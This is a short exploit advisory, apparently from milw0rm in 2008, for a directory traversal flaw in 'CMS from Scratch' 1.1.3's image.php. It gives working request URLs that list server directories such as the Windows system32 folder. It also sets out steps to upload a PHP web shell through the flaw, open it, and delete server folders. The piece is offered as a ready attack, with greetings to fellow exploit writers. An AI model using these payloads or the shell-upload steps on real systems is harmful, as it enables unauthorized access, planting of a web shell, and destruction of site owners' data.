1 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
2 CMS from Scratch <= 1.1.3 (image.php) Local Directory Traversal Vulnerability
3 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
4
5 author...: Stack
6 mail.....: Wanted
7 wanted by Egix
8 Gr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For founded it :d:)
9
10 Exploit :
11 # http://localhost/path/cms/images.php?dir=c:
12 Example :
13 # http://localhost/path/cms/images.php?dir=c:WINDOWS/system32/
14
15 Exploit 2 :
16
17 and you can upload php file ==> php shell
18 for example upload the php shell in my localhost
19 c:AppServ/www/
20 you go to link
21 # http://localhost/path/cms/images.php?dir=c:AppServ/www/
22 after click to colon [parcourir] after select your shell and click upload
23 and go to link
24 # http://localhost/shell.php
25 desc :you can delete all folder of server
26 just clike to mark delete in folder selected to delete
27
28 thx : allah
29
30 # milw0rm.com [2008−05−29]
Page 1/1
CMS from Scratch 1.1.3 image.php Directory Traversal Vulnerability
Stack
05/29/2008